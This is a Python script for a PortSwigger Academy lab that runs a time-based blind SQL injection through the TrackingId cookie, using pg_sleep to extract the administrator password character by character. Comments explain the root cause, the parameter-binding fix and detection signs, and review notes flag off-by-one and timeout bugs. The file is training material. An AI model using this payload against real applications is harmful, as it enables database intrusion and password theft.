import requests

# Time-based blind SQL injection exercise against a PortSwigger Web Security
# Academy lab instance. The script appends a SQL fragment to the TrackingId
# cookie and sends one GET request per (position, character) guess.
#
# Server-side root cause this lab demonstrates: the cookie value is placed
# into a SQL statement as text. Binding it as a query parameter removes the
# injection point. On the detection side, this traffic shows up as a burst of
# requests whose cookie carries SQL keywords / pg_sleep and, on a hit,
# a response delayed by about ten seconds.

url = 'https://0a03004a034fb137c4f82c9500f4000c.web-security-academy.net/'

# Candidate characters tried at every position: digits, lower case, upper case.
charset = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'

# URL-encoded fragment ('%3b' is ';', '+' is a space): closes the quoted
# string, then runs a second statement whose CASE calls pg_sleep(10) only when
# the character of the administrator password at the given position equals
# the guess. The two '{}' slots are (position, character).
payload_template = "'%3bselect+case+when+(username='administrator'+and+SUBSTRING(password,{},1)='{}')+then+pg_sleep(10)+else+pg_sleep(0)+end+from+users--"

# Lab-issued session/tracking values, hard-coded in the write-up.
# The Cookie entry below is replaced before the first request is sent.
headers = {
    "Host": "0a03004a034fb137c4f82c9500f4000c.web-security-academy.net",
    "Cookie": "session=2mfZwsZHlmyYL2mwPlK0e34AEA021iz7;TrackingId=Y7quZz53LMWRIZbA",
}

# Cookie prefix actually sent with every guess; the fragment is appended to
# the TrackingId value.
cookie_prefix = 'session=w3v9123vZW4IJxuNRuqJBOJ86sbLcmNb;TrackingId=i1NjLmRNA1lXR2pZ'

# NOTE(review): range(20) probes positions 0..19, while SQL SUBSTRING
# positions are 1-based.
for position in range(20):
    for guess in charset:
        headers["Cookie"] = cookie_prefix + payload_template.format(position, guess)
        # NOTE(review): with timeout=1, a response held back by pg_sleep(10)
        # surfaces as a requests timeout exception, which is not caught here;
        # the reason check below only sees responses that arrived in time.
        response = requests.get(url, headers=headers, timeout=1)
        if str(response.reason) == 'OK':
            continue
        print(guess, end='')